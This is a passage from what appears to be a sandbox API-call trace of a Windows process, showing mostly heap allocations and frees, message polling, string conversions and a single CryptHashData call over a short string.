lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0259.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0259.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0259.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0259.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0259.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0259.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0259.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0259.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0259.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0259.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0259.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0259.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0259.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0259.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0259.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0259.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0259.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0259.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0259.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0259.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0259.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0259.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0259.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0259.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0259.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0048 [0259.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0259.930] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0259.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0259.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0259.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0259.930] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0259.930] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0259.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.931] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0259.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0259.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0259.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0259.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0259.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0259.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f98 [0259.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0259.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0259.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0259.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0259.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0259.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.932] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0259.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0259.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0259.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0259.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0259.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0259.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0259.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.932] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0259.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0259.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0259.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0259.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0259.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55048, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0259.933] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0259.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0259.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0259.933] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.933] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0259.933] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0259.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0259.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0259.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0259.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0259.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51cd0 [0259.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51cd0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0259.934] CryptHashData (hHash=0xa87610, pbData=0x2e550f8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0259.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0259.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0259.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0259.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0259.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0259.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0259.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0259.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0259.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0259.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0259.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0259.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0259.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0259.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0259.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0259.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0259.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0259.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0259.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0259.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0259.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0259.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0259.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0259.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0259.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0259.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551d8 [0259.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0259.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0259.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0259.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0259.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0259.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0259.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0259.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0259.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0259.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0259.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0259.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0259.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0259.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0259.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0259.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0259.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0259.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0259.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0259.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0259.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0259.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0259.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0259.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0259.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0259.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0259.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0259.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0259.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0259.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0259.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0259.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) 